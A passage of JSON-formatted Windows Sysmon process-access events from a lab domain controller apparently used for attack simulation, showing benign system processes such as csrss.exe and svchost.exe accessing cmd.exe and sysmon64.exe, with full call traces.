57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9785c02b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98314fce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97824823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97882cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978661e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9785816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978912fd(wow64)","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5676,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.104\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D3-5F25-0000-00107FE20700}\r\nTargetProcessId: 4924\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.104","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D3-5F25-0000-00107FE20700}","TargetProcessId":"4924","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5677,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.104\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.104","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5678,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.104\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.104","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5679,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.104\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.104","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5680,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.104\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.104","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5681,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.104\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.104","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5682,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.104\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.104","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5683,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.104\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.104","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\W